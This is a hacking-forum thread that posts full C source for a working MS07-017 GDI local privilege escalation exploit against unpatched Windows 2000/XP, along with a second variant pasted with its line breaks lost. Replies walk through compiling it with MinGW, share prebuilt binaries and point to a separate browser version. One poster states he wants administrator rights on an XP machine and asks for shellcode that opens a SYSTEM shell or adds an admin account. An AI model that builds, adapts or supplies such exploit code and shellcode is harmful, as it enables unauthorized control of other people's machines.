11 replies to this topic

[Trinitron]

I just read this. It's scary stuff, it seems anyone can own an unpatched Windows box if he has a local account

/*
GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)

Coded by Lionel d'Hauenens 
http://www.labo-asso.com

Development:
------------
Dev-C++ 4.9.9.2
Linked with /lib/libgdi32.a 

References:
-----------
http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://www.milw0rm.com/exploits/3688 
http://ivanlef0u.free.fr/?p=41

March 16, 2007
*/

#include <stdio.h> 
#include <stdlib.h> 
#include <windows.h> 

typedef enum _SECTION_INFORMATION_CLASS
{
	SectionBasicInformation,
	SectionImageInformation
} SECTION_INFORMATION_CLASS;  
												
typedef struct _SECTION_BASIC_INFORMATION {
  ULONG				   Base;
  ULONG				   Attributes;
  LARGE_INTEGER		   Size;
} SECTION_BASIC_INFORMATION;

typedef struct _GDI_TABLE_ENTRY
{
   PVOID pKernelInfo;
   WORD  ProcessID; 
   WORD  _nCount;
   WORD  nUpper;
   BYTE  nType;
   BYTE  flags;
   PVOID pUserInfo;
} GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY;

typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG);  
NTQUERYSECTION NtQuerySection;											  

#define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix");
#define STATUS_SUCCESS 0
#define PAL_TYPE 8
	
DWORD flag_test;

hook (HANDLE pal, COLORREF couleur)
{
	 // INT3
	 // Executed code with kernel privilege
	 asm (".intel_syntax noprefix");
		 __asm ("cli");
		 
		 // it's the fiesta !!! :)				 
		 
		 __asm ("sti");		 
	 asm (".att_syntax noprefix");
	 
	 flag_test = 1;	  
	 
	 return (TRUE);	 
} 

int main(int argc, char *argv[])
{	
	SECTION_BASIC_INFORMATION SectionInfo;	
	PGDI_TABLE_ENTRY pGdiEntry;
	PLOGPALETTE pLogPal;
	HANDLE hPal;
	PVOID OriginalPalObject;
	PVOID FalsePalObject; 
	   
	HANDLE hThread = GetCurrentThread();  
	DWORD OriginalThreadPriotity = GetThreadPriority (hThread);  
	HANDLE hSection = (ULONG)0;  
	PVOID MapFile = 0;
	HANDLE hProcess = (HANDLE)0xFFFFFFFF;
	WORD Pid = GetCurrentProcessId();				 
				  
   	NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection");
		 
	printf ("##########################################################\n");				
	printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n");
	printf ("#		All Windows 2000/XP before MS07-017 patch	   #\n");
	printf ("##########################################################\n");   
	printf ("# coded by Lionel d'Hauenens   http://www.labo-asso.com  #\n");
	printf ("##########################################################\n\n");									 
													  
	// Search handle section and mapper in virtual memory of user
	while ((DWORD)hSection<0xFFFF) 
	{
		SectionInfo.Attributes = 0;  
		MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); 
		if (MapFile)
		{
			NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0);
			if (SectionInfo.Attributes == SEC_COMMIT) break;  // For compatibility with win2k 
			UnmapViewOfFile(MapFile); 
			MapFile = 0;
		}				
		hSection++;
	}

	if (!MapFile)
	{
	   printf ("Could not found shared section !\n");
	   exit(0);			 
	}			  

	// Create Palette
	pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1);	
	pLogPal->palNumEntries = 1;
	pLogPal->palVersion = 0x300;
	hPal = (HANDLE)CreatePalette(pLogPal);  
	
	if (!hPal)
	{
	   printf ("Could not create palette !\n");
	   exit(0);			 
	}	  
	
	// Search the entry of pal object 
	OriginalPalObject = (PVOID)0;		
	pGdiEntry = (PGDI_TABLE_ENTRY)MapFile;
	while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart)
	{
		  if ( pGdiEntry->ProcessID == Pid  &&
				  pGdiEntry->nType == PAL_TYPE )
		  {
			  // Save original pointer
			  OriginalPalObject =  (PVOID)pGdiEntry->pKernelInfo;						  
			  break;
		  }		   
		  pGdiEntry++;		  
	}

	if (!OriginalPalObject)
	{
	   printf ("Could not find entry of Pal object !\n");
	   exit(0);				  
	}  
	
	// Create the false Pal object
	FalsePalObject				   = (PVOID) calloc(0x100/4,4);
	((PDWORD)FalsePalObject)[0]	  = (DWORD)hPal;   // Handle	
	((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1;	 // Availabled flag
	((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex 
  
	printf ("Section:\n--------\n");															 
	printf ("Handle: 0x%08X	Attributes: %08X	Size: 0x%08X\n\n", hSection
																	, SectionInfo.Attributes
																	, SectionInfo.Size.QuadPart);
	printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); 
	printf ("Address of user map: 0x%08X\n", MapFile); 
	printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject);  
	printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) );	 
	printf ("Address of Hook(): 0x%08X\n\n", &hook);  

	//////////////////////////////////////////////////////////////////////////////
	//////////////////////////////////////////////////////////////////////////////  
	printf ("->Test...");
	flag_test = 0;			
	SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); 
		 
		 // Active false Pal object	
		 pGdiEntry->pKernelInfo = FalsePalObject;   
				 
			  GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :);
			 
		 // Restore original Pal object
		 pGdiEntry->pKernelInfo = OriginalPalObject; 
	
	SetThreadPriority (hThread,OriginalThreadPriotity);
	//////////////////////////////////////////////////////////////////////////////
	//////////////////////////////////////////////////////////////////////////////
	
	if (!flag_test) printf ("ERROR !!!\n");
	else printf ("OK :)\n");

	UnmapViewOfFile(MapFile);
	DeleteObject ((HANDLE)hPal);
	free((PVOID)pLogPal);
	free((PVOID)FalsePalObject);  
	system("PAUSE");		  
	return (0);		 
}

// milw0rm.com [2007-04-17]

[code641]

Wtf, i have never seen this exploit before... but its patched, so someone must have used it before ?_?

[MpR]

maybe Im confused as per the post as a whole but whats different from this and any other local exploit as per functionality as thats what locals do they elivate priviledges

or is there a difference ?

or is it just that the date published is recent ?


nothing against the exploit but just over all curious if I missed out on something extra special

[Ecko]

March 16, 2007

you see!? Old shit.

[rafaboss]

does anyone compiled them?

[da_cash]

yes with mingw without any errors

Attached Files

•  ms07_017gdi.rar   5.48K   36 downloads

[rafaboss]

Thanks da_crash, but I can´t still download something from here

Wich command do u used in MinGW?

command: gcc exploit.c -o exploit.exe

and I got theses msg errors:
C:\DOCUME~1\AAAA\CONFIG~1\Temp/cc4kbaaa.o(.text+0x4dd):exploit.c: undefined refe
rence to `CreatePalette@4'
C:\DOCUME~1\AAAA\CONFIG~1\Temp/cc4kbaaa.o(.text+0x69a):exploit.c: undefined refe
rence to `GetNearestPaletteIndex@8'
C:\DOCUME~1\AAAA\CONFIG~1\Temp/cc4kbaaa.o(.text+0x6fa):exploit.c: undefined refe
rence to `DeleteObject@4'

how can i compile?

[BilDos]

yes with mingw without any errors

Please upload to rapidshare.com

[da_cash]

Rafaboss. The compiler cannot find references to certain API's

"undefined reference to `CreatePalette@4'"

so just check msdn site and look for requirements for that API

Requirements

  Windows NT/2000/XP/Vista: Included in Windows NT 3.1 and later.
  Windows 95/98/Me: Included in Windows 95 and later.
  Header: Declared in Wingdi.h; include Windows.h.
  Library: Use Gdi32.lib.

As the last line shows which library we need to link with our source . In Mingw it has only a little different filename libgdi32.a

So just compile it with

gcc -o exploit.exe exploit.c C:\MinGW\lib\libgdi32.a

and then

strip.exe exploit.exe

to make exe smaller.


and that's all. Easy ?


my english sucks. i know

[rafaboss]

Yes, now its was very easy , thanks so much da_cash by lesson.

PS: Where can i find requeriments of Windows API? I can´t found in MSDN. thanks in advanced!

[josdegroof]

Hi,

I need this exploit to escalate my privileges on a Windows Xp-box (I want administrative rights). When I use the IE-version of this exploit, it works perfect. It opens a calc.exe process. When I use the C-version, it shows me the control-registers, so that is also very good.

My question is the following:

I don't really know assembler, so can anyone explain me the shellcode used in this exploit ? It says that this exploit can execute commands with kernel-privileges. Does this mean that I am able to open a local command-prompt with system-rights or I am able to add an extra administrator-user? If so, can anyone give me the shellcode to use, and tell me how to insert that shellcode ?

Thanks in advance,

(Compiled with MinGW:> gcc -o exploit.exe exploit.c c:\mingw\lib\libgdi32.a)

/*GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)Coded by Lionel d'Hauenens[url="http://www.labo-asso.com"]http://www.labo-asso.com[/url]Development:------------Dev-C++ 4.9.9.2Linked with /lib/libgdi32.aReferences:-----------http://www.microsoft...n/MS07-017.mspxhttp://research.eeye...y/20061106.htmlhttp://www.milw0rm.com/exploits/3688http://ivanlef0u.free.fr/?p=41Avril 19, 2007*/#include#include#includetypedef enum _SECTION_INFORMATION_CLASS{SectionBasicInformation,SectionImageInformation} SECTION_INFORMATION_CLASS;typedef struct _SECTION_BASIC_INFORMATION {ULONG Base;ULONG Attributes;LARGE_INTEGER Size;} SECTION_BASIC_INFORMATION;typedef struct _GDI_ENTRY{PVOID pKernelObject;DWORD ProcessID;WORD FullUnique;BYTE Type;BYTE Flags;PVOID pUserData;} GDI_ENTRY, *PGDI_ENTRY;typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG);NTQUERYSECTION NtQuerySection;#define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix");#define STATUS_SUCCESS 0#define PAL_TYPE 8DWORD kprocess;DWORD kthread;DWORD reg_cr0;DWORD reg_cr2;DWORD reg_cr3;DWORD reg_cr4;func_hook (){// INT3// Executed code with kernel privilegeasm ("cli ; pushal");asm (".intel_syntax noprefix");__asm ("xor esi, esi ;\xor edi,edi ;\mov ax,fs ;\cmp ax, 0x30 ;\jne no_pcr ;\mov esi, [fs:0x124] ;\mov edi, [esi+0x44] ;\no_pcr: ;\mov eax, cr0 ;\mov ebx, cr2 ;\mov ecx, cr3 ;\mov edx, cr4");asm (".att_syntax noprefix");asm ("":"=a"(reg_cr0), "=b"(reg_cr2), "=c"(reg_cr3), "=d"(reg_cr4), "=S"(kthread), "=D"(kprocess));asm ("popal ; sti");return (TRUE);}int main(int argc, char *argv[]){SECTION_BASIC_INFORMATION SectionInfo;PGDI_ENTRY pGdiEntry;PLOGPALETTE pLogPal;HANDLE hPal;DWORD OffsetGdiPalEntry;PVOID OriginalPalObject;PVOID FalsePalObject;HANDLE hThread = GetCurrentThread();DWORD OriginalThreadPriotity = GetThreadPriority (hThread);HANDLE hSection = (ULONG)0;PVOID MapFile = 0;HANDLE hProcess = GetCurrentProcess();DWORD Pid = GetCurrentProcessId();NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection");printf ("O--------------------------------------------------------O\n");printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n");printf ("# All Windows 2000/XP before MS07-017 patch #\n");printf ("#--------------------------------------------------------#\n");printf ("# coded by Lionel d'Hauenens #\n");printf ("# http://www.labo-asso.com #\n");printf ("# For educational only ! #\n");printf ("O--------------------------------------------------------O\n\n");// Create PalettepLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1);pLogPal->palNumEntries = 1;pLogPal->palVersion = 0x300;hPal = (HANDLE)CreatePalette(pLogPal);if (!hPal){printf ("Could not create palette !\n");exit(0);}OffsetGdiPalEntry = (((DWORD)hPal) & 0xFFFF)*sizeof(GDI_ENTRY);OriginalPalObject = (PVOID)0;// Search handle of sectionwhile ((DWORD)hSection<0xFFFF){SectionInfo.Attributes = 0;SectionInfo.Size.QuadPart = 0;// Map section in virtual memory of userMapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0);if (MapFile){// Checking presence of user PaletteNtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0);if ( SectionInfo.Attributes == SEC_COMMIT &&OffsetGdiPalEntry+sizeof(GDI_ENTRY) <= SectionInfo.Size.QuadPart ){pGdiEntry = (PGDI_ENTRY)(MapFile+OffsetGdiPalEntry);if ( (pGdiEntry->ProcessID & 0xFFFFFFFE) == Pid &&pGdiEntry->Type == PAL_TYPE ){// Save original pointer of pal objectOriginalPalObject = (PVOID)pGdiEntry->pKernelObject;break;}}UnmapViewOfFile(MapFile);MapFile = 0;}hSection++;}if (!OriginalPalObject){printf ("Could not find Pal object in kernel table !\n");exit(0);}// Create the false Pal objectFalsePalObject = (PVOID) calloc(0x100/4,4);((PDWORD)FalsePalObject)[0] = (DWORD) hPal; // Handle((PDWORD)FalsePalObject)[0x14/4] = (DWORD) pLogPal->palNumEntries;((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &func_hook; // Hook Interface with user function// original -> win32k!NtGdiGetNearestPaletteIndex////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////kprocess = 0;kthread = 0;reg_cr0 = 0;reg_cr2 = 0;reg_cr3 = 0;reg_cr4 = 0;SetThreadPriority (hThread, THREAD_PRIORITY_TIME_CRITICAL);// Activates false Pal objectpGdiEntry->pKernelObject = FalsePalObject;GetNearestPaletteIndex (hPal, 0); //--> call func_hook() with kernel privilege smile.gif;// Restores original Pal objectpGdiEntry->pKernelObject = OriginalPalObject;SetThreadPriority (hThread,OriginalThreadPriotity);////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////printf ("KPROCESS : 0x%08X\n", kprocess);printf ("KTHREAD : 0x%08X\n\n", kthread);printf ("Control Registers\n");printf ("-----------------\n");printf ("CR0 = 0x%08X\n", reg_cr0);printf ("CR2 = 0x%08X\n", reg_cr2);printf ("CR3 = 0x%08X\n", reg_cr3);printf ("CR4 = 0x%08X\n", reg_cr4);UnmapViewOfFile(MapFile);DeleteObject ((HANDLE)hPal);free((PVOID)pLogPal);free((PVOID)FalsePalObject);printf ("\n\n");system("PAUSE");return (0);}

IE-version:

http://rapidshare.co...3019649/aaa.zip

[khongminh9]

how to use this exploit ???????